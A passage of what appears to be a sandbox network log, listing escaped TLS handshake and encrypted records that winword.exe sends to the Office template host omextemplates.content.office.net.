  495. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x02\\xfdr\\xb4\\xa6\\x9d\\xcd\\xddq\\x81g\\x1f\\xd4\\xd3)\\xa2\\xb9\\x94\\xd6\\xef~\\x0f\\xc6fb\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  496.  
  497.  
  498. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xfa\\xa2\\x00\\xdf\\xd91\\xc7\\xfah\\xb8ii\\xee\t,\r%\\xcd\\xfe\\x1bw\\x80\\xe3\\x13\\x8e\\x14\\x90\\xac\\xf9z5\\x9en\\xea\\xd2\\xc5\\xbd\\xa0\\x85\\xba\\xe0\\x93\\xf9^\\x89\\xf0\\xcd\\x06.\\xf5\\xb0\\x834\\x9c\\xacm\\x97\\xff\\x93k2\\xe7\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000hcws\\x0f\\xc5\\x95\\xf1&\\xde\\xbe\\x06\\x05*\\x0ei\\xd7\\xeat\"\\x06\\xf1\\xb1\\xfcxow\\xe9b4$5\\xb2\\xc1u\\x10\\xd5\\xd6mv\\xba\\xf3\\xe1\\x16\\x98p@"
  499.  
  500.  
  501. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x01\\xf9\\xcc\\xeai.\\xd1\\xf7\t\\xbd\\xc7\\xd9\\x82\\xdb\\xdf\"\\x80\\x9b\\xce\\x876\\xb6wp\\xf0y\\xa64\\xf5a\\xa7\\xea\\xb3n\\xd8e\\x1c\\x99\\xef\\x0f\\xa8x\\xa0\\xabr\\xcbw\\x9d\\xaf\\xa9\\x81\"a\\x95\\x19\\x0e\\xc0\\xd2\\x86\\x0e\\xf0i6\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x9b(\\x13\\xf4\\xca\\xa6\\x183\\xdf~w\\xd2\\x9a\\x16\\xecrl\\xa1c\\xef\\x9d0*\\xee\\xf2%\\x7fd\\x98\\xa3,no'\\x11=\\xa5\\xa5n\\x0f+\\x97\\xb5\\x14\\x9f\\x98x"
  502.  
  503.  
  504. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04w\\xca\\x8f\\xecq\\xabu\\x11\\xb8\\xe8\\x08c\\xab\\x8d\\xe7p\\x7f\\x0c\\xb4\\xe9%|\\xe1\\x03\n4\\xcc*/\\x1c\\x839\\x0bhg\\oi\\xd4\\xcb\\xce\\x16\\xa3n\\xf9\\xbf\\xdd\\xca\\xeb_v@\\x16\\x0c\\x99\\xe6t\\x11\\xeb\\xb7\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000|\\x16\\x10,i\\xc8\\xf07\\xe2\\xf45\\xc3oe\\xf1r\\xf1\\xbc\\xf6\\xcdoe<gm\\xf6\\x06\\x17j\\x15d\\x85\\x9e;|a\\xcb\\x9d\\x84/\\xb7o\\xf2\\x98)c\\x80"
  505.  
  506.  
  507. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xea4\\xdb\\xd7\\xc9\\xf8\\x88\\xf6c\\xc5\\x1df1=\\x84\\xd5\\x87`\\xa4gw\\x8e\t\\xdb\\x0b\\xe7o\\xfb!\\xc2m\\x18t\\xc4v\\xc7h'j5\\xc4\t1ul\\x17\t<\\x8f\\xc9pa\\xbai\\xb2\\x96*\\xed\\xcb`\\x1f\"\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xe4\\x8e\t\\xd0\\x9d\\xc1\\x11\\xf7@2f\\xb9\\x125_\\xc1\\xf1 \\x8ci\\xde\\x91\\xb6\\x85g\\x9b\\x87\\xd9\\xef\\xe8\\xecn\\x9a\\x15kz\\xec'\\xb8c\\xf1%$\\x1f\\x926h"
  508.  
  509.  
  510. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xad\\xbfl\\xa7\\xc2\\x14\t\\xb3t\\xf7\\xf6\\xc2\\xa0\\x15\\xd6\\x8f3\\xba\\xbf\\xab\\xe0c\\xae\\x16\\x94\\x1a,\\xa5\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  511.  
  512.  
  513. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xba~\\xfc\\x1a\\xf7\\x0c\\x95w\\x1ba\\x18r\\x8c\\x99\\x0e~l<\\x10\\x07r\\x86\\x8b`\\x8d\\xeb\\xd0-\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  514.  
  515.  
  516. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xd2\\x9f\\xb4\\x9edvlbr\\x18\\xb5t\\xad\\xc8b\\x9a$z\\xe4\\xa8\\xb3\\xf8\\xd2d\\x91\\xdf#\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  517.  
  518.  
  519. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010k\\x19:g:\\xe2r`\\xec\\x17\\xf3\\xeczvgc\\x8c#\\x95i\\x7f\\xe8\\xbb*+9w\\xde\\xc9\\xda\\xc4\\xbf\\xc7\\xdbw6%@.\\xeb\\xa7\\xf9\\x0f\\xe6\\x01t\\xee\\xf2\\xa8y>\\xbf/'*\\xb2g\\x03@31\\x00\\xd0\\x19wy`\\x84x\\x18\\x14\\xcb\\xb9\\x97\\xe82\\xd4r\\x0e\\xe1\\xfd\\x9a\\xc1\\xf0du7\\x8b\\x10`l\\x0e\\x03\\x18y\\x96\\xf0.\\x16\\xe2\\xb8\\xdex\\xd8v\\x80\\x97\\xe1n\\xf0\\x9d\\xa2\\xd2j\rqyv\\x19vc\\xc1u#m\\x95,$\\xbd\\xc0\\xd6\\xfa\\xb5\\xe2\\xf0t\\x84\\x8b\\x8a*\\x95\\xb5a\\xd7k\\xa5\\xa1~\\x17;h\\x95\\xc6\\xa2c\\x91\\xef\\x16\\xa2il\\xa6l\\xb7w \\\\xb1i\\xad\\xac~\\x80\\x8b\\xaa\\xd7\\xc7-p\\xd8:ee8\\xf2\n\\xf3\\x90\\x92\\xdc\\xe2;x^\n>\\xb8\\x19\\xdb\\xa4e60\\xcd\\xe0\\x84d\\x8f\\xde\\xec\\xdch\\x1c\\xd1\\x80l?\\x04,g\\x0b\\x89\\x15+\\x08\\xdcc\\xf1\\x91r\\xcc\\x95n\\x18td\\xaf)3<\\x85\\xd8\\xac\\xcb|\\xab\\x1c\\x9b\\xb9"
  520.  
  521.  
  522. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xf5\\x94\\xdc\\x845u\\xe9&\\xc2\\x01t\\xbd\\xfa\\x10\\xe5w\\xa8\\x8cd%6\\x05jh$v\\x1e\\xcc\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  523.  
  524.  
  525. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x84di\\xaa \\xb5i\\x82\\xe1\\xa3\\x91\\xd0\\x9c\\xecv\\xf8e\\xb6\\x9c\\xfdh\\x87\\xcb\\xceu\\xd8-\\xf2\\x14\\xaa\\x97\\x85\\xd5~@\\xfe\\x0c\\xb0z\\xe4f '\\x1e\\xb3=!.\\x17\\xef\\x02bxz\\xea.\\xefuny\\xfdwj\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xa9_\\x14\\xf2z\\xf3\\\\xeb\\xdf\\x8be\\xa6b@g\\xd6\\x9d\\x99\\xb1\\xc8\\xa6\\x0e8\\xb3\\xe7\\x06\\xd2lr\\xbf\\xb6\\x02\\xeau\\xe0;!\\xe33\\x87d\\x90\\xbc4\\x17\\xfa"
  526.  
  527.  
  528. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xfb<\\xa8\\x88j'\\xec\\xb2\\xb4\\x86^i\\x07l\\xf9\n\\x04s\\xaa\\x96*\\xd6\\xe5(\\x7f\\xa0\\xbd\\xe5\\xe6\\xc6ze\\x90b\\x83\\x88\\xf8\\xaba\\x91\\xc8\\xf5\\x8eu fc\\xf6\\xaa\\x96\\xd5\\xd4\\xfe\\xca\\xcf\\x1cp\"x\\x9b\\xb3\\x08\\xec\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000h\\xa5\\xd7\"~-\\xd1\\x9cw\\xda\\xca\\x9e\\xb0\\x8f\\x17o\\xfd\\xeb\\x8dw\\xf1p\\xef?\\xa5z\\x86=\\xfa\\xec\\xc5\\xe1\\x7f\\xc0\\xac\\xe6\\x07\\x05\\x7f\\xa8\\x01\rs\\x10\\xb2\\xc2"
  529.  
  530.  
  531. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04b\\x97\\xeae;y\\xec\\x1at\\xba\\xb6\\x81\\xe3\\x83\\xaau=e\\x85\\x0e\\x97\\x1b\\x93\\xefcj\\xdbb\\xce\\x8a8\\xb8pg\\xe2\\xf6\\x1c\n\\xec0\\xd8\r\\xf9\\xb6\\xfd\\xb8\\x83\\xb1@\\xab\\xdb\\xa8\\xabj\\xb3h\\x99\\x8cl\\x8cq\\x86\\xff*\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000(y\\xe5\\\\xfb\\xc4\\xb0v=\\xa9\\xa8\\x0c\\xef2\\x822\\x1f\\xd7\\xa9\\xfam\\xec\\xbb\\x02\\xa56\\xef\\xcc\\x18\\xe8.\\xdd7\\x9d\\xe1\\xc4\\xc9e\\xfe\\xf2\\xdc\\x0c\t7\\xe5\\xe18"
  532.  
  533.  
  534. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xf7#\\xa3\\x0e\\x8c\\xa44\\x87\\xa65\\x8ffg\\x8b\\x9a\\xd9j\\x95\\x90\\xa8z\\x7f\\xf7\\xfa\\xe5\\x0eu\\xac\\xa7\\xd3\\xd1\\xf0\\xf4o\\xea\\x1e\\xd8\\xf6k\"\\xde\\xe5\\xc2\\x1f\\xb7\\xa2\\xe1g\\x03\\x11=\\x9a\\x0frz\nm4\\x8b\\xe78\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xd4^!%o\\xa8\\x88m\\xb9\\xc9\\xa6\\x9e\\x99o\\xc7w\\xcd%\\xe2(\\xddd\\xf1\\x11\\x94\\xc4e\\x12n\\xf2?\\xc4id\\x81\\xab\\xc7&f\\x04,\\xc2:\\xd6\\xf3\\xfb\\x07"
  535.  
  536.  
  537. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x0c\\xf1\\xba\\x11\\xc5\\xa4a\\xad\\xe3\\xd0\\xb6\\xb9\\xf0|\\x14\\x97\\xfd\\xfcv\\xbcvi!\\xd0,2\\x99\\x1d\\xdc 5\\xb1\\xe4q\\xed\\xb3\\xd7\\x87\\xcb\\x8c\\xfd\\x1eedz\\xab3\\xdd\\xaf\\xea\\xd7\\x01\\xac%\\x05\\xbc5\\xf78\\xea)m\\xe8-\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\r\\x82\\xea\\x97<\\\\xcd\\x06\\x1f<\\xd0\\xa0\\x1c\\x00?\\xdf\\xbb\\xc1\\x1a_\\x94\\x87xy\\xc2(f\\xa5\\xd3*\\xa1\\xc4\\xca\n!/\\xf0\\x15&\\xe9p\\x17\\xect(\\x9a\\xacx"
  538.  
  539.  
  540. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x94l\\xbf\\x10\\xfa\\x99mq\\x9e\\xe1ez@\\xb1\\x88\\x93\\xc3\\xa8z\\x86\\x8f\"\\xa48;\\xc0ol\\x9e\\xae\\xa3\\xd1\\x0b\\xa5\\x06\\x8c\\x13\\xbc\\x8f\\xdap\\xa2`\\xa9cr\\xa1\\xa6\\xed\\x98/t;,4\r\\x8dpk+\\xa3o\\xc6\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000s\\xe0\\x90\\x18\\x8b\\xe6\\xf7\\x80\\x1ct\\x821\\x10g\\x90?\\xe9\\xe3\\x90ac\\xc2.\\xc7\\xba\\xd1\\xb7\\xebmx\\x9b\\x85\\xf2\\x9a\\xfb\\x1dk\\xf0f\\xa0f\\xff\\xf9\\x96\\x9a\\xc8v"
  541.  
  542.  
  543. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xe9c\\xedyx\\xcd\\x13\t6\\xd2\\xd5\\x81\\xae\\xf8\\xea(\\xd0\\xde\\xfe\\x9c\\x95x\\x03d\\xc5\\\\x17>\\x1am\\x12q\\xe1\\x9b!h\\xa4`\\xd9\\x14\\x9e\\x19>p\\xe5\\xdf\\xa5\\xf6\\x9a\\xe0\\x923'i7r\\xee~\\xde%\\x91\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000n\\xb0\\xf6\\xbc\\xbd\\xe2d'\\xf4\\x8c\\x1b\\x16\\xe5\\xe3\\x14\\xef\\xa2\\xaa6\\xa2-\\xd5/\\x82\\x9b\\xd6u\\x0e\\x9d\\x8d\\xed\\xf6\\x8c\\x88\\xd8\\xddye\\xfe_ti\\x94\\x01y\\x86\\x01"
  544.  
  545.  
  546. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xa0t\\x1f\\x82\\xc3\\x8f\\xeao\\x85\\xac\\x90\\xa4\\xffw\\xd6\\xed\\xd5\\x07\"\\xfe\\x1c\\x84x\\xd8\\xb3\\x0ex\\xfc\\x13\\x1ex\\x9b\\xae\\xda\\x11\\xe1#\\x17e\\xf8\\x1bk\\x13\\x18(-u\\xbf\\x10\\x98\\xf6\\xab\\xcc\\xae\\xcd'\\xcc3\\x89\r7'\\x08\\xd9\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xbcbz\\xe4:\\x96\\xb6\\x1b\\xc6\\xaf\\xef\\xc4vn\\x8d\\xa8\\xc5,(\tk&\\xdc\\x04rntk\\xc5\\xddt\\xdb\\x90\\x0f\\xa8zff\"\\x068p\\x00\\xd1\\xb5\\xa2"
  547.  
  548.  
  549. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x9e\\x86\\xbf\\xc5\\x9e\\xf0\\xd6\\x1d\\x80\\xc3\\x0c\\xa6:\\xc7\\xca\\x7f\\xa03\\xd0\\x9d\\xe6`\\x14\\xe0\\x03\\xbe\n\\xe5\\x12\\xafx\\xad\\x0eke\\xc0o\\xfd\\xaeb\\x08+\\x89u'\\x8f)\\x98im\\xc9_z\\x9an\"t\\x98x\\xbb\\xa7\\xd7\\xe8\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x04\\xff\\xbc \\x8a\\x8fo\\x9e\\xca\\xda\\xd4\\x86\\xfbe\\\\x16\\xbd2\\xeba'0\\xae\na\\xd3\\x0b\\x92z\\xa2l\\x8b\\x0b\\x89\\x86\\xf0\\x9f\\xbd\\x8d\\x9b\\x80\\x00\\x8f\\xf9\\xdb+s!"
  550.  
  551.  
  552. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd4x\\xd7a\\x0b\\x82e\\xcd\\x12\\xdb\\x033\\xf7\\xf8'\\x90\\xf7\\xbad\\x93b\\xd6\\x11q'\\xdf\\x196\\x82\\xed\\xce#m\\x9c\\xc7\\x87\\xe5k\\x1a\\xb9v\\x99\\xd7\\xd5\\xe4\"\\xb2\\x90`\n-\\xd2/\\xee?kp\\x850\\xe1\\xa9r\\x9a\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xca\\xc1\\x80\\x15>\\xc1\\x80\\xf6\\xc1c?e\\xb2p\\xc3/p \\x8a\\xa9)\\xba\\x016\\xbd\\xba\\x89\\xa9\\x9dh\\xaaqy\\x1d2?\\xff\\x00\\x8c\\xc7\\x0c\\x1e\\x07\\xbe\\x80\\xba\\xa6"
  553.  
  554.  
  555. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04/\\x92\\xe9\\xdf\\xa5u\\x9e\\xf2p\t\\x0ce\\xb8\\xb0\\xf9\\x82p\\xd2\\x92,\\xca\\xa6\\x02\\xad5vb\\xdco\\x8a\\xee\\xe1\\xf6\\xb6:\\x98\\x8a\\xdbc\\x06xs\\x9e6\\xe9\\xa5\\xddah\\x87e\\xcb\\x8a\\xf4\\xcdw\\xdf\\x8d\\x94\\x8f\\x07\\xc6^\\x18\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000-\\xff\\xf9\\xef\\xafe\\xc293<\r\\xc1s6\\x91\\x9f\\xde\\xdd\\xa0p\\x9b:-\\xf1\\x88\\xb1\\x1f(dc\\xfb\\x04+n\\xbe\\xd8\\x8a\\xfd\\xbc\\xf0\\xed\\x13'\\x05d\\x95"
  556.  
  557.  
  558. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xc1k6\\x03\\xc4\\x91\\xc2\\x18\\xe8\\xad\\x93kg\\x02z\\xd3\\x94\\x94\\xe5@\\x8f\\xafm\\x87\\xa1\\x1b\\xb0\\xd7\\xa5g\\xce\\xe4uc\\x8dn&\\x01\\xfd\\xf7q)\\x8ad/\\xf5\\xb0\\x16\\x9fxc\\xd86k\\xf7q\\x84a\\xa6\\xb0 \\xc7o\\x16\\x82*\\xf3\\xf8_\\xbdc\\xdf\\xde\\x8a2\\x9d\\xd7r\\xf2~\\x8c\\xd3^v\\x03\\xd9\\xde9t\\x9a\\x88\\x95/\\x928\\x99\\xec\\\\x97\\x96\\x85\\\\xac\\xc2j\\xee\\xe8h\\xac\\xd71\\x89\\x88o\\x91\\xd5\\x81~\\x00\\x1da\\x86\\x80\\x11\\xe7\\xd7\\xd2\\x1a\\xea\\xd3m\r\\xf9>\\x14t\\xb3\\x11 \\x1c\\xbcb\\xffx\\xcaa\\xa3k\\x9cto\\xe4\\xbe\\x96\\xf0k\\x00\\xfex\\xf1\\xd1o\\xdfm\\xa9\\xce\\xa4\\xd7\\xea\\x80ks&\\xb1w\\x0c\\xe8\\xd9\\x0c\\x87\\x82\\xd4\\x05f\\xdch\\x17\\xa0\\xaa\\xca4a\\x13\\xc5\\xc7\\xd5\\xb8,5\\xb2\\xc4t\\xb8\\xdf\\xfe\\x9f\\xf5\\xf2t\nxk\\x1e\\xeb\\xc0\\xff\\x0f\\\\xca\\xe0\\x9b\\xc7\\xb2\\xab\\xdb\\x89\\xfdp4\\xf2;kbpz\\x18,\\x8fu\\x0b\\x82\\x94h\\xc8\\xa4\\xe5r"
  559.  
  560.  
  561. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x0109h\\xd01\\x19\\xae\\xad*\\x86\\xdd\\xdd.\\x93\\xca\\x15\\xc8y\\xc4\\x9bd\\xbb\\xc2\\x97\\xd8\\x03\\x86\\xa9\\x8a8\\xb3!k\\xcf9\\x1cl\\xb0b\\x86\\xe7q7\\xecf\\x98n\\xb3\\x02\\xd0\\xa8!\\xdd\\xe4\\xca^\\xa6\nq7v\\xa8>/\\xec(\\x9f\\xf99\\xc8m\\xcbu\\xf0\\xcd\\xa3\\xf0\\x9f\\xe4\\x15\\x13\\x8ejo_\\xa0\\xb0>\\x8dh\\x95\\xc8&\\xd1\\x01\\x8b\\xa1\\x03o\\xf8\\xf6\\xf3i\\x87\\x8d\\xf3:\\x9d\\x12c\\x89\\xad+t+\\x11\\xa9xb\\xe7\\xdd^\\xd8\\xdee`\\xc3\\xcf\\x95\\x0c?\\xc4\\xf2\\x04\\\\x9a\\xb8y0\\xca\\xde\\x15\\xe4x\\x11\\x00\\x0482i\\x03\\xde|nz\\x7f\\xe5\\xc3\\xaa\\x94b\\xdf\\x08b\\xa8g\\x19\\xa4\\x88'w7\\xb49i\\x1cu\\xf5\\x88rcl\\x98k*\\x11\\xce\\xd2\\xfcd\\xc7\\x1f\\x9a\\xa7q!\\xf7\\xca\\d\\xf1\\x06wm&\\xa5h#\\xe6\\xe8\\x18|\\xe0\\xee\\xc8\\x1c\\xf5i!x\\xfd\\x86ki\\\\xc5vl\\x90d\\x97\\xf0>w%m\\xce\\xd2\\xa6\\x96\\xeb\\xa6\\xbc\\x90\\xeb"
  562.  
  563.  
  564. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x16\\x90\\xc7\\x07\"l\\x80\\x075hm\\xc1\\x90\\xe3\t\\xc8\n`\\xd9\\x00u\\xb8\\xcf\\xb0x\\xcal/\\xa5\\xc5\\x9b6+\\xce\\x80\\x01\\x80\\x07\\x93\\x07j\\x94\\xd7\\xeb1\\xd3\\x86\\xbe\\xc0\\xab\\xad\\xbf\\xd7\\xa867\\xe8:z|\\xabdv\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000z\\xed\\xce\\x90\\x06\\xbd\\xf6?4\\xf46\\xfa\\\\xbcn\\xcf\\x8e\\xfc\\xc4\\x0e\\x1f+b\\xfeq\\xfarjar\\x00k#.\\x91d6\"p<)^\\xb5\\x1d\\x0f)\\x0b\\xa5"
  565.  
  566.  
  567. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x8e\\xefe\\x12\\xcaq\\xa7\\x04\\xb2\\x05\\xbe\na\\x13w\\x81\\xd6d\\x94#\\x89@:\rm\\x18\\xa7\\xd3\\x08z:\\xfah\\x07e\\xda\\x1fl\\xcb\\xb5\\xbb\\xe8vq\\xbc\\x92\\xef\\xa6i\\xc3v>ki\\x92=*vj\\x13w,\\xc8\\xd4\\xddl\\xea\\xc4\\xc5\\x01\\xa7\\x96\\xd2\\xc7\\x89ww\\xba\\xbf\\xc2\\x9f\\xf5y\\xf3\\xf7\\x81r\\x90s\\xc2\\x17\\xf4=h\\xaa\\xe9\\xf1\\xe2-\\x08\\xa7\\xb0\\x97\\x1b\\xb87=\rp\\xe0\\x1au\\x86\\x02\\xc3\\xa3r\\x86\\x87\\x8d\\x18:\\xa9\\x03\\xeal\\xadjb\\xa1iy\\x05t\\xc6&-\\x9a\\xd2\\x90\\x97e\t\\x9f\\xc1\\xbb\\x12\\xabdx?\\xbf\\xe2\\xeak\\x01\\xb7\\xef\\x1c\\xadz\\xcc+@\\xfb\\xe0\\xa9i\\xdag8\\xc4\\x8fh1\\xf1|\\xd1\\xe9x\\x11\\xe5\\x19\\x11\\xb0\\xdd/\\xb0\\x81\\xb7c\\x08\\xd4\\xbc@\\xd907\\x07j\\x00\\x18vl\\x1c\\x93\\xce\\xc9\\x18^)5\\x91c\\x00d\\xea\\xfe4\\x8e\\xe6\\xd0\\xf4+\\xcb\\xe9`\\xa2\\x88ge\\x8a\\x80l\\x94r.\\xf9\\xb8\\xfe\\xa0\\xb2)z\\x05\\xa7xy\\xf2j5"
  568.  
  569.  
  570. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xa3\\xec\\xe99\\xbf:\\xbeq\\xbbx\\xe6\\xebdh\\xb9`\\xad\\xad\\x9b7e\\xdb;\\xc6\\xf3\\x06\\xa2,.\\x8co\\xfdh\\x13)\\xe6g\n\\xc0*q3l\\xd1\\x0c\\xfe\\x14\\xa9\\x05\\xca\\xca\\xb4\\xbc\\xd0\\x93\\x04+\\xec$z\\xb0\\xd6\\xean\\xd5v\\xa6\\xfa\\xd6\\xe1\\xce\\xb6o\\xe0\\xe7i\\xb1/bi*\\xa1\\xb7#\\xba\\xd2\\xb9\\xfc\\xed\\xbamt\\xf9\\x8b\\xe3\\xc3f\\xbe\\xb0k\\xe7\r\\x10p h\\xa9f\\x03\\x81\\x91\\xe6\\xde\\x98\\x9b\\x8di\\x04\\x18!\\x1f\\x8eh\\xee\\x86\\xd8\\xe0\\xa4\\xd47m\\xa8\\xde\\xe08m\\x94x\\xc2\\xcb)l\\xe5\\x1da\\xca5\\xf1\\x8e\\xa2~q\\x8e\\x85m*\\xc5;\\xab\\xf1\\x85\\xc9dc\\x18a\\xaby\\x88\\xfcu\\x89\\xee\\x1ah\\x1d\\xf8\\xd3\\xd5p\\xd0\\xb5\\x1fbwp\\x90\\xd2\\xbadz\\xcf4d\\x1a\\xc6v\\xdc\\x16 \r\\x0e\\x9b\\xa3\\x89|\\xa3\\xaa\\xab\n\\xc8\\x89\\xe5\\\\xc1ys\\x87\\x1a\\x9f\\xf8=\\xb8$\\xcd\\x91\\x86\\x07y\\xc8\\xa4\\x04v\\xc0\\xd5\\xccsg\\x13t\\xf6y\\xeb"
  571.  
  572.  
  573. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x8f\\xad\\x01\\x0c\\xce\\xd2\\xb1\\xb0\\x82\\x8a\\xc9\\xe2\\xf2\\x1a(`\\xc1\\xad\\x84\\xbei\\xf4\\xe8\\xca<\\xed\\xfdn\\x87kq\\\\xf4\\x90\\xbf\\xf2\\x05e\\x93yv\\xc2\\xcf\\xa0\\x9c\\x15\\xa0\\x9b4z\\x04\\xdb\\xc4ha\\x00gt\\x15\\x9b\\xc3c\\x8d\\x96\t\\xdf\\xa7n\\xca\\xc6\\xce=\\x0b;\\x8ehr\\xec;\\xa6(\\xeb\\x84z\\xff\\x95\n+h\\x07\t\\x91\\xf2\\xc21\\xef\"5=\\x1b\\x13\\xdb4\\xe2\\xe5\\x88q\\x11f\\xf0w\\x0bh\\x98\\xc2\\xe4\\xdb=\\xe4w\\xc48\\x97\\x1e\\xaas4\\x12\\xbf+\\xee\\x7f\\xb6\\xdam\\xe4hz\\xb7\\x13\\xd3\\xbai\\xbad\\xea2\\xdbwd\\xdb\\xce\\xf0\\xac\\xdc\\xf5\\xf5\\xb8\\xa6\\xa9\\x06u\\xce\\x7fgk)\\x18\\x9avc\\x1b\\xe0\\xf5e\\x92\\xcaueu7\\xc9:\\x8c9u\\xa4\\x16?8z\\xc7\\x02\\x9bon\\xecw\\x9a\\xbe\\x9a'\\xab\\xcf \\xeb\\xc0`\\xd0\\xa3d\\x9e\\xd6e>\\xd1b\nv-\\xdd\\x92\\xa5\\xfbj\\x92\\x90\\xbb\\xe2\\x0esh\\x8e:6\\xf3`\\x81\\x81l)\\xa5\\xb1\\x19j\\xe1"
  574.  
  575.  
